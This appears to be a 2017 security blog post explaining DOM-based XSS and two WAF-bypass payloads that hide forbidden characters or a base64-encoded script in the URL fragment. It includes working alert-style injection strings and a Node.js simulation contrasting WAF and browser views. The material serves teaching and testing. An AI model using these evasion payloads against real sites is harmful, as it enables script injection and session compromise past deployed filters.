
Using DOM Based XSS To Bypass WAF

February 5, 2017

What is DOM Based XSS?

DOM Based XSS is a cross-site scripting attack in which the flaw lies in how the page's own client-side JavaScript handles data taken from the DOM (for example location.hash, location.search or document.referrer), rather than in the HTML the server returns. The client-side script reads attacker-controlled input and writes it into the DOM, or hands it to an execution sink such as eval() or location, without sanitizing it first. The payload therefore runs entirely inside the victim's browser, in the DOM environment set up by the page's legitimate script. This is a problem for a Web Application Firewall (WAF): a WAF only inspects traffic between client and server, and in the DOM-based case the malicious part of the input can be kept out of the request altogether (the URL fragment after # is never sent to the server). That makes DOM Based XSS one of the hardest and most dangerous types of XSS to find, and a server-side filter such as a WAF will not block these attacks.

For the purposes of this article, I will present two attack vectors that turn a reflected XSS injection point into a DOM based one, keeping the forbidden part of the payload in the URL fragment where the WAF cannot see it, and examine each of them closely.

Vector 1

<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]>#:()

This payload relies on string concatenation and on location.hash to smuggle in prohibited characters. It is usable where the characters [ ] . + / = are permitted but commonly blocked characters such as ( ) : are strictly prohibited. The letters come from regex literals: /java/.source evaluates to the string "java" without needing quotes. location.hash[index] then supplies the forbidden characters one at a time from the fragment #:() (index 0 is the # itself): location.hash[1] is ':', location.hash[2] is '(' and location.hash[3] is ')'. The browser assembles javascript:alert(document.domain) and assigning it to location executes it. The #:() belongs to the URL, not to the injected parameter (the > closes the injected tag), and the fragment is never transmitted to the server, so the WAF never sees the forbidden characters.

Vector 2

<svg/onload=eval(location.hash.slice(1))>?#alert(1)

Here location.hash is the fragment including its leading #, and slice(1) returns everything from position 1 onward, that is, the fragment without the #. The resulting string, alert(1), is passed to eval() and executed as JavaScript. In the example, ?# stands for the rest of the URL after the injected tag: only the fragment is read at runtime. If the eval keyword is blocked in the vector, alternative execution points that evaluate a string, such as setTimeout, can be used instead. Also note that Firefox handles the encoding of location.hash differently from other browsers, so characters in the fragment may not arrive as typed; wrapping the fragment in base64 and decoding it with atob makes sure the payload works properly, because the base64 alphabet contains nothing that gets percent-encoded in a fragment.

NOTE: The execution point (the sink) is the place where the user-controlled input ends up being executed.

Therefore:

<svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
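The following is an added example, not code from the original post: it simulates, under Node.js, what a server-side WAF can inspect for the vectors above versus what the browser reconstructs from the fragment. The host example.test, the two WAF rule sets and the URLs are constructed for the demonstration; location is replaced by a plain object holding the fragment, so nothing is navigated or evaluated.

```javascript
// Added example (not from the original post): WAF view versus browser view
// for Vector 1 (character smuggling via location.hash[i]) and Vector 2
// (base64 payload decoded with atob). Runs under Node.js.

// Hypothetical WAF rule sets. CHAR_RULES models the Vector 1 scenario, where
// ( ) : are forbidden; SIGNATURE_RULES models a signature-based filter.
const CHAR_RULES = [/[():]/];
const SIGNATURE_RULES = [/alert\s*\(/i, /document\.(domain|cookie)/i];

// What a server-side filter can inspect: path and query, with percent-encoding
// normalised. The fragment (everything after #) is not part of the HTTP
// request, so it is deliberately excluded here.
function serverVisiblePart(url) {
  const u = new URL(url);
  return decodeURIComponent(u.pathname + u.search);
}

function wafBlocks(text, rules) {
  return rules.some((rule) => rule.test(text));
}

// What the browser exposes to the page's script: the fragment with its
// leading '#', exactly as location.hash would.
function fragmentOf(url) {
  return new URL(url).hash;
}

// Vector 1's onload handler as a function of a location-like object. The
// regex-literal .source trick supplies letters without quotes, and the
// forbidden characters ':' '(' ')' are read out of the fragment by index.
function vector1Sink(location) {
  return /java/.source + /script/.source + location.hash[1] +
         /al/.source + /ert/.source + location.hash[2] +
         /docu/.source + /ment.domain/.source + location.hash[3];
}

// Vector 2's onload handler: drop the '#' and base64-decode. In the browser
// this is atob(); Buffer is used so the example runs under Node.
function vector2Sink(location) {
  return Buffer.from(location.hash.slice(1), 'base64').toString('latin1');
}

function demonstrate() {
  // Constructed URLs; the injected value sits in the q parameter.
  const naive = 'https://example.test/page?q=<svg/onload=alert(document.domain)>';
  const url1 = 'https://example.test/page?q=<svg/onload=location=/java/.source+' +
    '/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+' +
    '/docu/.source+/ment.domain/.source+location.hash[3]>#:()';
  const url2 = 'https://example.test/page?q=<svg/onload=eval(atob(location.hash.slice(1)))>' +
    '#YWxlcnQoMSkvLw==';

  return {
    // The plain reflected payload is caught by either rule set.
    naiveBlocked: wafBlocks(serverVisiblePart(naive), CHAR_RULES) &&
                  wafBlocks(serverVisiblePart(naive), SIGNATURE_RULES),
    // Vector 1: no ( ) : in the request, yet the browser builds the full URL.
    vector1Blocked: wafBlocks(serverVisiblePart(url1), CHAR_RULES),
    vector1Client: vector1Sink({ hash: fragmentOf(url1) }),
    // Vector 2: no "alert(" or "document." in the request; the payload is
    // only materialised after atob() in the browser.
    vector2Blocked: wafBlocks(serverVisiblePart(url2), SIGNATURE_RULES),
    vector2Client: vector2Sink({ hash: fragmentOf(url2) }),
  };
}

module.exports = { serverVisiblePart, wafBlocks, fragmentOf, vector1Sink, vector2Sink, demonstrate };
```

Running demonstrate() shows naiveBlocked as true while both vector flags are false, with vector1Client equal to javascript:alert(document.domain) and vector2Client equal to alert(1)//. The point of the simulation is the split inside serverVisiblePart: anything a WAF matches on has to be in the path, query, headers or body, and both vectors keep the recognisable part of the payload in the fragment that the browser never sends.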

We can locate DOM based XSS using relatively simple techniques, such as the test scripts linked here. In practice this means reviewing the page's client-side code for sources such as location.hash, location.search and document.referrer that flow into execution or HTML sinks such as eval, setTimeout, location and innerHTML without sanitization.
